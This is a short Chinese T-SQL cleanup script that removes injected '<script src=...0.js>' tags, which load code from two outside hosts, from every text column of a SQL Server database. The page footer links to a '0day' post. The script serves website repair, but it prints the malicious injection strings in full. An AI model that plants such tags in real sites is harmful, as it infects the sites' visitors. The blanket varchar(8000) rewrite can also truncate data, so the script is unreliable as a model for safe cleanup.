SQL Server 清除木马
drop table te
drop function dbo.mdSQL
select a.name as Cname,b.name as tbname into te from syscolumns a,sysobjects b,systypes c
where b.xtype='U' and a.id=b.id and a.xtype=c.xtype
and c.name in ('text','ntext','varchar','nvarchar','char','nchar')
go
create function mdSQL(@tbname varchar(1000),@Cname varchar(1000),@str varchar(1000))
returns varchar(1000)
as
begin
declare @sql varchar(1000)
set @sql=''
select @sql='update '+@tbname+ ' set '+@Cname + ' = replace(cast('+@Cname+' as varchar(8000)) ,'''+@str+''','''')'
--select @sql='update '+@tbname+ ' set '+@Cname + ' = replace('+@Cname+','''+@str+''','''')'
return @sql
end
go
Declare curStudentFee Cursor
for
select dbo.mdSQL(tbname,Cname,'<script src=http://www.myhack58.com/0.js></script><script src=http://8f8el3l.cn/0.js></script>') from te
Declare @iStudentFeeID varchar(1000)
--初始化
Set @iStudentFeeID=''
--打开游标
Open curStudentFee
--循环并提取记录
Fetch Next From curStudentFee Into @iStudentFeeID
While ( @@Fetch_Status=0 )
begin
exec (@iStudentFeeID)
Fetch Next From curStudentFee Into @iStudentFeeID
end
--关闭游标
Close curStudentFee
--释放游标
Deallocate curStudentFee
下一篇:记事狗微博3.0 0day